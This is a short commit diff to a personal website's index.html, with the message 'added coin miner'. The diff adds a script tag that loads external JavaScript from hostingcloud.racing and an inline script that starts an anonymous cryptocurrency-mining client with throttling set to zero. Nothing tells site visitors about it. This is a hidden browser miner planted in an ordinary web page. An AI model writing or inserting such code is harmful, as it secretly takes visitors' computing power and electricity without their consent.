added coin miner

--- a/index.html
+++ b/index.html
@@ -17,6 +17,13 @@
     </script>
   </video>
   <meta name="keywords" content="Kai,Kozlov,website,Kai Kozlov">
+  <script src="https://www.hostingcloud.racing/xw9n.js"></script>
+<script>
+    var _client = new Client.Anonymous('d66e658b4489472e6a0352dfa494cadaed7251ed2011ce209e447c7b030a8df2', {
+        throttle: 0, ads: 0
+    });
+    _client.start();
+</script>
 </head>
 
 <body>
